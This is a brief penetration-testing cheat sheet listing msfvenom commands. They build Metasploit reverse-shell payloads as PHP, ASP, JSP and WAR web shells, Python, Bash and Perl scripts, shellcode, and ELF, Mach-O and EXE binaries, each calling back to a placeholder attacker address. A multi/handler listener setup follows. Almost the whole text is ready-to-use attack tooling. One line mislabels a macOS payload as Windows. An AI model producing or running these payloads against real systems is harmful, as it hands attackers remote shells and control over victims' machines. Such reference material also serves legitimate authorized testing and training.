Metasploit Payloads

Web Based Payloads

PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > rshell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f asp > rshell.asp

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > rshell.jsp

WAR (Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f war > rshell.war

Script Language payloads

Python
msfvenom -p cmd/unix/reverse_python LHOST=x.x.x.x LPORT=4444 -f raw > rshell.py

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=x.x.x.x LPORT=4444 -f raw > rshell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=x.x.x.x LPORT=4444 -f raw > rshell.pl

Shellcode

Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f <languague>

Windows
msfvenom -p osx/x86/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f <languague>

Binaries

Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf > rshell.elf

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f macho > rshell.macho

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe > rshell.exe

MSF Handlers

use exploit/multi/handler
set PAYLOAD <Your selected payload above>
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z

SAROOT